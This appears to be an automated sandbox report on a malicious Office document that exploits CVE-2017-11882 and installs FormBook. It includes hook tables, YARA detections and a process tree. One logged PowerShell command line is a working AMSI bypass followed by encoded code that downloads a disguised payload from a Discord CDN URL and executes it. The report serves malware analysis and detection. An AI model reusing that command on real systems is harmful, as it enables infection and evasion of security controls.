                                                                2021-12-02 20:47:22 UTC1775INData Raw: 68 45 4c 47 42 44 4f 43 78 67 4d 54 51 73 59 45 55 79 4c 47 41 30 52 69 78 67 52 44 63 73 59 45 55 7a 4c 47 41 30 4f 53 78 67 4d 7a 51 73 59 44 6b 33 4c 47 41 30 4e 69 78 67 4e 44 51 73 59 44 59 7a 4c 47 41 79 52 69 78 67 4f 54 4d 73 59 44 4a 43 4c 47 41 7a 4d 53 78 67 4d 44 6b 73 59 45 45 34 4c 47 41 32 51 53 78 67 51 6a 45 73 59 45 4a 43 4c 47 42 42 4f 53 78 67 52 6b 4d 73 59 45 45 77 4c 47 42 44 4d 69 78 67 4d 55 59 73 59 44 63 34 4c 47 41 77 4d 79 78 67 4e 6a 45 73 59 44 64 42 4c 47 41 79 52 53 78 67 4e 6a 55 73 59 45 5a 47 4c 47 41 79 51 69 78 67 51 6a 67 73 59 44 4e 46 4c 47 41 79 4d 43 78 67 4f 44 49 73 59 45 55 77 4c 47 42 47 52 43 78 67 4e 55 55 73 59 44 63 7a 4c 47 41 7a 52 53 78 67 52 6a 41 73 59 44 55 30 4c 47 42 44 4f 53 78 67 52 45 59 73 59
                                                                Data Ascii: hELGBDOCxgMTQsYEUyLGA0RixgRDcsYEUzLGA0OSxgMzQsYDk3LGA0NixgNDQsYDYzLGAyRixgOTMsYDJCLGAzMSxgMDksYEE4LGA2QSxgQjEsYEJCLGBBOSxgRkMsYEEwLGBDMixgMUYsYDc4LGAwMyxgNjEsYDdBLGAyRSxgNjUsYEZGLGAyQixgQjgsYDNFLGAyMCxgODIsYEUwLGBGRCxgNUUsYDczLGAzRSxgRjAsYDU0LGBDOSxgREYsY
                                                                2021-12-02 20:47:22 UTC1791INData Raw: 59 35 4c 47 41 31 4d 69 78 67 4f 54 6b 73 59 44 4d 32 4c 47 41 77 4f 53 78 67 4d 44 4d 73 59 44 56 46 4c 47 41 79 4d 53 78 67 4e 6a 59 73 59 44 45 34 4c 47 42 43 4e 53 78 67 4d 45 51 73 59 45 4a 42 4c 47 41 33 4e 53 78 67 4d 30 49 73 59 45 59 78 4c 47 41 34 51 69 78 67 4f 54 4d 73 59 45 56 42 4c 47 41 79 4d 53 78 67 51 30 4d 73 59 44 41 33 4c 47 42 43 4d 43 78 67 4d 30 45 73 59 44 67 34 4c 47 41 7a 4e 53 78 67 4f 45 51 73 59 44 49 7a 4c 47 41 77 52 69 78 67 52 6b 59 73 59 45 49 31 4c 47 42 46 51 69 78 67 52 6a 6b 73 59 45 49 79 4c 47 41 77 4d 53 78 67 52 44 63 73 59 44 4e 42 4c 47 41 32 51 69 78 67 52 6a 51 73 59 44 6b 78 4c 47 42 47 4d 53 78 67 4d 6a 41 73 59 44 56 42 4c 47 41 30 51 69 78 67 52 6a 6b 73 59 44 6c 47 4c 47 41 30 52 69 78 67 4d 55 55 73 59
                                                                Data Ascii: Y5LGA1MixgOTksYDM2LGAwOSxgMDMsYDVFLGAyMSxgNjYsYDE4LGBCNSxgMEQsYEJBLGA3NSxgM0IsYEYxLGA4QixgOTMsYEVBLGAyMSxgQ0MsYDA3LGBCMCxgM0EsYDg4LGAzNSxgOEQsYDIzLGAwRixgRkYsYEI1LGBFQixgRjksYEIyLGAwMSxgRDcsYDNBLGA2QixgRjQsYDkxLGBGMSxgMjAsYDVBLGA0QixgRjksYDlGLGA0RixgMUUsY
                                                                2021-12-02 20:47:22 UTC1807INData Raw: 59 30 4c 47 42 45 4f 43 78 67 4d 7a 41 73 59 44 56 43 4c 47 41 35 51 69 78 67 52 44 49 73 59 44 4d 32 4c 47 41 31 4d 53 78 67 4f 45 59 73 59 44 41 77 4c 47 41 78 51 79 78 67 4d 45 49 73 59 44 52 43 4c 47 41 77 4d 69 78 67 51 30 49 73 59 44 4a 42 4c 47 41 79 4e 69 78 67 52 54 67 73 59 44 41 32 4c 47 41 34 4e 53 78 67 4f 55 51 73 59 45 52 43 4c 47 42 45 4e 79 78 67 4e 6a 59 73 59 44 68 42 4c 47 41 7a 52 53 78 67 4f 55 59 73 59 44 63 30 4c 47 41 34 4e 53 78 67 4e 44 67 73 59 44 51 7a 4c 47 41 7a 51 53 78 67 4f 54 6b 73 59 44 59 31 4c 47 41 34 52 53 78 67 4d 7a 55 73 59 44 51 78 4c 47 42 45 4d 79 78 67 4d 44 4d 73 59 44 45 31 4c 47 41 79 4d 43 78 67 4d 6b 49 73 59 44 64 43 4c 47 41 7a 52 53 78 67 4e 55 55 73 59 45 4d 32 4c 47 41 33 51 69 78 67 4d 55 45 73 59
                                                                Data Ascii: Y0LGBEOCxgMzAsYDVCLGA5QixgRDIsYDM2LGA1MSxgOEYsYDAwLGAxQyxgMEIsYDRCLGAwMixgQ0IsYDJBLGAyNixgRTgsYDA2LGA4NSxgOUQsYERCLGBENyxgNjYsYDhBLGAzRSxgOUYsYDc0LGA4NSxgNDgsYDQzLGAzQSxgOTksYDY1LGA4RSxgMzUsYDQxLGBEMyxgMDMsYDE1LGAyMCxgMkIsYDdCLGAzRSxgNUUsYEM2LGA3QixgMUEsY
                                                                2021-12-02 20:47:22 UTC1823INData Raw: 6b 33 4c 47 41 79 4d 79 78 67 52 6b 49 73 59 45 55 32 4c 47 41 34 52 43 78 67 51 54 41 73 59 45 46 44 4c 47 41 79 4e 79 78 67 51 30 45 73 59 45 49 79 4c 47 42 47 51 53 78 67 52 6a 49 73 59 44 45 77 4c 47 41 34 4f 53 78 67 4d 6a 45 73 59 45 4d 33 4c 47 41 31 4f 43 78 67 4e 44 55 73 59 44 46 44 4c 47 41 35 4d 79 78 67 4e 54 4d 73 59 44 41 32 4c 47 41 77 51 79 78 67 52 6a 55 73 59 45 49 35 4c 47 41 32 4e 69 78 67 4f 54 51 73 59 45 4d 31 4c 47 42 46 4d 43 78 67 4d 54 59 73 59 45 49 30 4c 47 41 35 4d 43 78 67 4f 44 51 73 59 44 68 47 4c 47 41 7a 4d 43 78 67 52 55 51 73 59 45 4a 43 4c 47 41 77 52 69 78 67 51 7a 41 73 59 44 64 47 4c 47 42 42 4e 79 78 67 52 54 4d 73 59 44 63 77 4c 47 42 44 52 53 78 67 4e 45 49 73 59 44 46 47 4c 47 41 7a 4d 43 78 67 52 44 41 73 59
                                                                Data Ascii: k3LGAyMyxgRkIsYEU2LGA4RCxgQTAsYEFDLGAyNyxgQ0EsYEIyLGBGQSxgRjIsYDEwLGA4OSxgMjEsYEM3LGA1OCxgNDUsYDFDLGA5MyxgNTMsYDA2LGAwQyxgRjUsYEI5LGA2NixgOTQsYEM1LGBFMCxgMTYsYEI0LGA5MCxgODQsYDhGLGAzMCxgRUQsYEJCLGAwRixgQzAsYDdGLGBBNyxgRTMsYDcwLGBDRSxgNEIsYDFGLGAzMCxgRDAsY
                                                                2021-12-02 20:47:22 UTC1839INData Raw: 52 47 4c 47 41 79 4e 53 78 67 51 55 49 73 59 44 41 78 4c 47 42 46 52 43 78 67 4d 7a 45 73 59 44 45 31 4c 47 42 47 4d 79 78 67 51 6a 51 73 59 45 4e 43 4c 47 41 77 52 53 78 67 4d 7a 45 73 59 44 4a 43 4c 47 42 44 51 79 78 67 4f 54 41 73 59 45 59 34 4c 47 41 32 51 79 78 67 51 54 45 73 59 45 4a 43 4c 47 42 42 51 53 78 67 4f 45 4d 73 59 44 55 7a 4c 47 41 77 51 53 78 67 4d 44 49 73 59 44 63 77 4c 47 42 46 4e 43 78 67 4d 44 67 73 59 44 41 7a 4c 47 41 79 4f 43 78 67 4d 54 51 73 59 44 5a 43 4c 47 41 7a 4d 53 78 67 4e 6a 45 73 59 44 5a 46 4c 47 42 47 4d 79 78 67 52 55 55 73 59 44 6c 46 4c 47 41 31 4e 43 78 67 52 54 41 73 59 44 49 33 4c 47 42 47 4d 53 78 67 51 6a 59 73 59 44 4a 46 4c 47 41 31 51 69 78 67 4d 6a 51 73 59 44 55 79 4c 47 41 7a 51 53 78 67 4d 6b 51 73 59
                                                                Data Ascii: RGLGAyNSxgQUIsYDAxLGBFRCxgMzEsYDE1LGBGMyxgQjQsYENCLGAwRSxgMzEsYDJCLGBDQyxgOTAsYEY4LGA2QyxgQTEsYEJCLGBBQSxgOEMsYDUzLGAwQSxgMDIsYDcwLGBFNCxgMDgsYDAzLGAyOCxgMTQsYDZCLGAzMSxgNjEsYDZFLGBGMyxgRUUsYDlFLGA1NCxgRTAsYDI3LGBGMSxgQjYsYDJFLGA1QixgMjQsYDUyLGAzQSxgMkQsY
                                                                2021-12-02 20:47:22 UTC1855INData Raw: 4d 30 4c 47 41 7a 4f 43 78 67 4d 6b 45 73 59 45 5a 44 4c 47 41 30 4f 53 78 67 52 6a 59 73 59 45 5a 46 4c 47 41 32 4d 53 78 67 4e 30 4d 73 59 45 51 31 4c 47 41 31 4e 53 78 67 52 54 63 73 59 45 4e 42 4c 47 41 79 4f 43 78 67 52 45 49 73 59 44 45 33 4c 47 42 46 52 43 78 67 4d 44 51 73 59 44 4d 79 4c 47 42 42 4d 69 78 67 4d 45 55 73 59 44 51 33 4c 47 41 79 4d 53 78 67 52 54 55 73 59 44 67 30 4c 47 42 47 52 53 78 67 4f 55 51 73 59 44 51 32 4c 47 41 32 51 53 78 67 51 55 4d 73 59 45 4d 77 4c 47 41 31 52 43 78 67 52 6a 41 73 59 44 68 47 4c 47 41 77 51 69 78 67 51 6a 67 73 59 44 4a 47 4c 47 42 42 4f 43 78 67 4d 6a 49 73 59 44 51 31 4c 47 41 35 51 53 78 67 51 30 55 73 59 45 56 46 4c 47 42 46 51 53 78 67 4f 44 67 73 59 44 4e 46 4c 47 41 30 4d 53 78 67 4d 54 59 73 59
                                                                Data Ascii: M0LGAzOCxgMkEsYEZDLGA0OSxgRjYsYEZFLGA2MSxgN0MsYEQ1LGA1NSxgRTcsYENBLGAyOCxgREIsYDE3LGBFRCxgMDQsYDMyLGBBMixgMEUsYDQ3LGAyMSxgRTUsYDg0LGBGRSxgOUQsYDQ2LGA2QSxgQUMsYEMwLGA1RCxgRjAsYDhGLGAwQixgQjgsYDJGLGBBOCxgMjIsYDQ1LGA5QSxgQ0UsYEVFLGBFQSxgODgsYDNFLGA0MSxgMTYsY
                                                                2021-12-02 20:47:22 UTC1871INData Raw: 4d 30 4c 47 41 7a 51 69 78 67 51 7a 67 73 59 45 4e 47 4c 47 41 78 51 53 78 67 51 55 51 73 59 45 55 31 4c 47 42 46 52 53 78 67 4f 55 45 73 59 44 56 43 4c 47 41 35 4d 79 78 67 4d 30 45 73 59 44 52 46 4c 47 41 32 4d 69 78 67 4f 44 67 73 59 45 4d 32 4c 47 41 33 51 79 78 67 4d 7a 45 73 59 45 5a 43 4c 47 42 45 4f 43 78 67 4e 54 41 73 59 44 42 45 4c 47 41 79 4d 79 78 67 52 6a 4d 73 59 44 42 45 4c 47 41 79 4d 43 78 67 4d 7a 6b 73 59 45 56 44 4c 47 41 31 52 69 78 67 4e 6b 45 73 59 45 55 32 4c 47 41 79 4e 69 78 67 4e 6b 45 73 59 44 51 78 4c 47 42 45 4d 79 78 67 51 6b 55 73 59 44 6b 33 4c 47 42 43 52 53 78 67 51 54 59 73 59 44 41 78 4c 47 41 35 4e 69 78 67 4d 6a 55 73 59 44 64 43 4c 47 41 30 4e 43 78 67 4f 44 51 73 59 44 59 32 4c 47 41 30 52 53 78 67 52 6b 4d 73 59
                                                                Data Ascii: M0LGAzQixgQzgsYENGLGAxQSxgQUQsYEU1LGBFRSxgOUEsYDVCLGA5MyxgM0EsYDRFLGA2MixgODgsYEM2LGA3QyxgMzEsYEZCLGBEOCxgNTAsYDBELGAyMyxgRjMsYDBELGAyMCxgMzksYEVDLGA1RixgNkEsYEU2LGAyNixgNkEsYDQxLGBEMyxgQkUsYDk3LGBCRSxgQTYsYDAxLGA5NixgMjUsYDdCLGA0NCxgODQsYDY2LGA0RSxgRkMsY


                                                                Code Manipulations

                                                                User Modules

                                                                Hook Summary

                                                                Function NameHook TypeActive in Processes
                                                                PeekMessageAINLINEexplorer.exe
                                                                PeekMessageWINLINEexplorer.exe
                                                                GetMessageWINLINEexplorer.exe
                                                                GetMessageAINLINEexplorer.exe

                                                                Processes

                                                                Process: explorer.exe, Module: USER32.dll
                                                                Function NameHook TypeNew Data
                                                                PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB
                                                                PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                                GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEB
                                                                GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEB

                                                                Statistics

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Start time:21:46:16
                                                                Start date:02/12/2021
                                                                Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                Imagebase:0x13f2b0000
                                                                File size:1423704 bytes
                                                                MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: 00000000.00000002.568094233.0000000006339000.00000004.00000001.sdmp, Author: John Davison
                                                                • Rule: rtf_cve2017_11882_ole, Description: Attempts to identify the exploit CVE 2017 11882, Source: 00000000.00000003.562381137.0000000006339000.00000004.00000001.sdmp, Author: John Davison
                                                                Reputation:high

                                                                General

                                                                Start time:21:46:19
                                                                Start date:02/12/2021
                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                Imagebase:0x400000
                                                                File size:543304 bytes
                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:46:19
                                                                Start date:02/12/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:CmD.exe /C cscript %tmp%\Client.vbs A C
                                                                Imagebase:0x4a960000
                                                                File size:302592 bytes
                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                General

                                                                Start time:21:46:20
                                                                Start date:02/12/2021
                                                                Path:C:\Windows\SysWOW64\cscript.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
                                                                Imagebase:0x120000
                                                                File size:126976 bytes
                                                                MD5 hash:A3A35EE79C64A640152B3113E6E254E2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate

                                                                General

                                                                Start time:21:46:21
                                                                Start date:02/12/2021
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like '*iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like '*Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$0462662046266204626620462662046266204626620462662=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,57,49,53,51,52,55,56,52,53,55,53,50,55,48,53,49,48,57,47,57,49,53,55,57,57,56,48,48,55,52,48,52,54,50,54,54,50,47,109,111,110,111,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($0462662046266204626620462662046266204626620462662)|I`E`X
                                                                Imagebase:0x13fef0000
                                                                File size:473600 bytes
                                                                MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:.Net C# or VB.NET
                                                                Reputation:high

                                                                General

                                                                Start time:21:46:48
                                                                Start date:02/12/2021
                                                                Path:C:\Windows\SysWOW64\calc.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:{path}
                                                                Imagebase:0x940000
                                                                File size:776192 bytes
                                                                MD5 hash:60B7C0FEAD45F2066E5B805A91F4F0FC
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.510729080.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.473605358.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.473336925.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.511533102.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.510812516.0000000000280000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:moderate

                                                                General

                                                                Start time:21:46:52
                                                                Start date:02/12/2021
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\Explorer.EXE
                                                                Imagebase:0xffa10000
                                                                File size:3229696 bytes
                                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.492675256.000000000986B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.502031840.000000000986B000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:high

                                                                General

                                                                Start time:21:47:04
                                                                Start date:02/12/2021
                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                Imagebase:0x800000
                                                                File size:44544 bytes
                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.684885243.00000000001F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.684930109.00000000002B0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.684853632.00000000000D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:high

                                                                General

                                                                Start time:21:47:09
                                                                Start date:02/12/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:/c del "C:\WINDOWS\syswow64\calc.exe"
                                                                Imagebase:0x4abf0000
                                                                File size:302592 bytes
                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >